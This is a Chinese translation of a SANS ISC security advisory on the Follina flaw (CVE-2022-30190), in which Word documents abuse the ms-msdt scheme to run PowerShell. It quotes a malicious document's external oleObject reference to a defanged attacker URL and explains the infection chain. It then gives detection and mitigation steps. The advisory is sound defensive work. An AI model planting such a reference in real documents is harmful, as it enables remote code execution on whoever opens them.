通过 ms-msdt 可攻击 Microsoft Office (CVE-2022-30190)
原文:https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/我们知道 Microsoft Office 文档的此新的攻击方法始于 @nao_sec 的一条推文,他报告了一个有趣的 Word 文档。 一直以来,Office 文档是传播恶意软件的载体。我们必须与 VBA 宏、XLS 4 宏、嵌入式 payload 等作斗争,但这里的描述很有趣。
此文件在 VT 上目前只有 17 家引擎报红 (https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection)
当打开文件时,什么都没有显示 (它看起来像一个空白文档),但是,查看文档规范,会看到一些有趣的东西:该文档包含指向恶意 URL 的外部引用:
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
当打开文档并激活内容时,将访问 www[.]xmlformats[.]com,获取以下 payload:
有趣的部分是 windows.location.href。协议架构是 "ms-msdt:/" (注意单斜杠)。这个 MSDT 或 "Microsoft 支持诊断工具" 是什么?msdt.exe 是 Microsoft 提供的一种工具,作用是收集信息以发送给 Microsoft 支持。
Microsoft Office 将自动处理 MSDT URL 并执行 Powershell payload。Base64 包含以下内容:
即使宏被禁用,受保护的视图功能也会发挥作用。但是,Kevin Beaumont 测试了转换为 RTF 形式的文档。即使在 Windows 资源管理器 中预览文档,它也能正常工作。此漏洞不适用于所有 Office 版本 (至少在 Office 2013 和 2016 中)。
当我们在周末查看恶意文件时,Didier 制作了一个新的 payload,它将触发一个经典计算器作为代码执行的演示,他录制了该行为的视频:https://www.youtube.com/watch?v=GybD70_rZDs。
这种行为真的很糟糕,如何检测到这一点?请注意,文档中不存在可疑方案 ("ms-msdt:/")。它存在于将由 Office 下载的第一阶段 payload 中。这里有一些想法:
[*]检查父子关系:一个好主意是跟踪从 word.exe 或 excel.exe 等父进程启动的 msdt.exe 进程;
[*]从注册表中删除 "ms-msdt" 方案,Didier 进行了一些测试,并且它有效:https://twitter.com/DidierStevens/status/1531033449561264128;
[*]通过创建 ASL 规则防止 Office 产生子进程:Set-MpPreference -AttackSurfaceReductionRules_Ids d4f940ab-401b-4efc-aadc-ad5f3c50688a -AttackSurfaceReductionRules_Actions Enabled;
[*]当然,在培训时不要打开可疑文件;
我们将继续关注这一新的攻击方法并更新此文章,随时与我们分享您的发现。可参看以下 PPT 来了解更多细节:
参考
[*]https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1530196847679401984%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fcdn.embedly.com%2Fwidgets%2Fmedia.html%3Ftype%3Dtext2Fhtmlkey%3Da19fcc184b9711e1b4764040d3dc5c07schema%3Dtwitterurl%3Dhttps3A%2F%2Ftwitter.com%2Fnao_sec%2Fstatus%2F1530196847679401984image%3Dhttps3A%2F%2Fi.embed.ly%2F1%2Fimage3Furl3Dhttps253A252F252Fabs.twimg.com252Ferrors252Flogo46x38.png26key3Da19fcc184b9711e1b4764040d3dc5c07
[*]https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
[*]https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt
[*]https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
[*]https://www.youtube.com/watch?v=GybD70_rZDs
[*]https://twitter.com/DidierStevens/status/1531033449561264128
页:
[1]